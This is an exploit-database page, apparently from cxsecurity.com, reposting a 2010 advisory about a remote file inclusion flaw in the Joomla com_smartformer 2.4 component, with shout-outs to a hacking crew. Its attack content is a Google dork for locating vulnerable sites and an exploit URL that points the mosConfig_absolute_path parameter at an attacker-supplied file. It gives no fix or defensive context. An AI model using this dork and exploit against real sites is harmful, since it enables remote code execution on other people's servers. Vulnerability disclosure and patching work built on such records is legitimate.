The Joomla Smartformer component 2.4 remote file inclusion vulnerability

2010.11.04
Credit: jos_ali_joe
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

========================================================= Joomla Component com_smartformer v.2.4 RFI Vulnerability ========================================================= [+]Title : Joomla Component com_smartformer v.2.4 RFI Vulnerability [+]Software : Joomla Smart Former v. 2.4 [+]Vendor : http://www.itoris.com/ [+]Download : http://www.itoris.com/joomla-form-builder-smartformer.html [+]Author : jos_ali_joe [+]Contact : josalijoe[at]yahoo[dot]com [+]Home : http://josalijoe.wordpress.com/ ######################################################################## Dork : inurl:index.php?option="com_smartformer" ######################################################################## ------------------------------------------------------------------------ RFI Exploit Exploit : http://example.com/components/com_smartformer/smartformer.php?mosConfig_absolute_path=[ Tecon - Crew ] -------------------------------------------------------------------------- Thanx For : ./ guitariznoize - cassaprodigy - cH0cH0bEe - jimmyRomanticDevil - jurank_dankkal ./ ne0 d4rk fl00d3r - nesta - shadowsmaker - wongrantau - zee eichel - All admin , staff and member Tecon - Crew Special Thanks : /. Tecon - Crew My Team : ./Indonesian Coder [+] Note : [+] Terima Kasih buat forum Tecon dari staff dan admin nya di sini kayak nya saya menemukan keluarga yang bisa terima saya apa adanya . dan mohon bimbingan dari agan2 Tecon semua ^:)^ buat gan nesta thanks gan walaupun saya jarang chat sama gan nesta tapi tiap gan nesta coment pasti bikin ane terenyuh :P ane g' maho lho masih normal :P [+] Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban. Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban, Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top